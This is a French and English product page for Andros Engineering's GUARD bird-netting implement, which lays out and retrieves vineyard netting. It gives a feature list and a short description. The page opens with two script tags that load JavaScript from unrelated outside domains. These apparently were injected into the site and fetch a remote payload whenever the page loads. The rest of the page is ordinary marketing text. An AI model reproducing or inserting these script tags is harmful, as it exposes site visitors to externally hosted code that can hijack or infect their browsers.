<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
fonctionnalités
- Adaptateur Cat II 3 Pt. intégré.
- Auto Levelwind.
- Chargement et déchargement rapide de la bobine.
- Fauteuil de sécurité avec ceinture de sécurité.
- Flèche verticale réglable
- Rapport 4:1 Régulation précise de la vitesse de rotation.
- Hydraulique à centre ouvert avec un débit de 4 gpm.
- Couvre jusqu'à 1 acre par heure.
- Équipe de 3 personnes pour la mise en page et la récupération

Installer et récupérer des filets à oiseaux dans les vignobles

L'Andros GUARD Netting Implements (Bird) est l'appareil qui a révolutionné la façon dont la viticulture traite la faune intrusive ; ce système est conçu à la fois pour l'aménagement et la récupération des filets de protection linéaire de la faune.

La conception de cet appareil se caractérise par notre système complet de flèche télescopique pour la récupération et la disposition, ce qui offre à l'utilisateur la flexibilité d'ajuster en "temps réel". De plus, le matériel est collecté avec notre Agri-Spool II 28" de renommée mondiale, créé spécialement pour la protection et la réutilisation des filets.

"Quelle que soit la hauteur requise, ce système est doté d'une flèche verticale intégrée qui permet aux techniciens sur le terrain de lever et d'abaisser la bobine d'aménagement ou l'entonnoir de collecte pour obtenir les meilleures conditions d'exploitation productive.


 

Prêt à en savoir plus?

Contactez-nous Andros Engineeringpour en savoir plus !

Netmaster_v001_web
Features
• Integrated Cat II 3 Pt. adapter.
• Auto Levelwind.
• Quick spool load and release.
• Safety chair with Safety Belt.
• Adjustable Vertical Boom
• 4:1 ratio Precision Speed Control.
• Open Center Hydraulics w/ 4 gpm flow requirement.
• Covers up to 1 acre per hour.
• 3 Person Team for layout and Retrieval

Install and Retrieve Bird Netting in vineyards

The Andros GUARD Netting Implements (Bird) is the device that has revolutionized how viticulture handles intrusive wildlife; this system is designed to both, layout and retrieves linear wildlife protection net.

This device's design features our comprehensive telescoping boom system for retrieval and also layout; this provides users the flexibility for adjusting “real time”. In addition, the material is collected with our world famous 28” Agri-Spool II, created specifically for net protection, and reuse.

"No matter what height is required", this system has a built in vertical boom which allows field technicians the ability to raise and lower either layout spool, or collecting funnel, achieving the best scope for productive operation.


 

Ready to find out more?

Contact Andros Engineering to find out more!